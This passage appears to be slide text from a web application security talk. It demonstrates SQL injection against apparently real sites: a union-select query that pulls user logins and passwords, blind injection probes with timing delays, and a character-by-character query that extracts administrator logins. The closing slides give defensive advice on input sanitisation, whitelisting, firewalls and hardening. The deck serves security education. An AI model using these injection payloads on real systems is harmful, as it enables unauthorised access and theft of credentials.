  • 80. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select  1,2,3,login,5,6,7,8,9,10,pass,12,sex,14,15,16,17,18 from users#&submit=Szukaj M
  • 81. Some S E C R E T S slip out ;-) 14831 users already registered (yeah, right ;-) M
  • 82. Another discovery:  There is 1836 bots :-) M
  • 83. Blind SQL Injection Registration form: B ‘
  • 84. Blind SQL Injection (experimenting)  1' and 1='0  OK  1' or 1='1  This email is already registered. You need to pick another one  1' union all SELECT IF( user() like '%sig%', BENCHMARK(3000000,MD5( 'x' )),NULL)#  delay  user() == sig@...  1' union all SELECT IF( user() like '%asd%', BENCHMARK(3000000,MD5( 'x' )),NULL)#  no delay B
  • 85. Products 1-8 of 8 B
  • 86. Product database for selected category is empty B
  • 87. Blind SQL Injection • /zgoda.php?id=155765%20AND%20(select%2 0ascii(substring((select%20login%20from%20a dmini%20limit%201,1),1,1)))%3D97 • id=155765 AND (select ascii(substring((select login from admini limit LINIA,1), MIEJSCE, 1))) =ZNAK_ASCII B
  • 88. Results of a successful blind SQL Injection attack  Delay  Different content  Error message B
  • 89. What can we do?  Filter and sanitise input data - Characters white-listing - Consistency (IDS, Firewall, Application, Database)  Do not trust user-side filters (selection lists, JavaScript, etc) M
  • 91. Web application security is bad Vulnerability-causing mistakes are everywhere* *well, almost everywhere ;-) M
  • 92. What to do? Be sure to properly sanitise data coming from and being sent to the user  Web Application Firewall (WAF)  IDS White-listing! M
  • 93. Be aware of potential threats  Listenand ask  Use professional assistance  Perform a cost-benefit analysis every piece of feedback is worth listening M
  • 94. Use proven solutions • Traditional coding errors got answered by managed code, automatic typing, GC, etc. • Web frameworks help maintain code quality in Web Applications – Assure code quality to some degree – We are not 100% safe » Frameworks are not mature enough » Not everyone knows how to use them properly » Sometimes expanded in a dumb way » Wide exploitation due to mass usage M
  • 95. Hardening Proper configuration is a key! One application server configuration directive may prevent a vulnerability from being exploited PHP: http://www.sans.org/top20/#s1 M
  • 96. Think! No technical control will protect you from logical errors M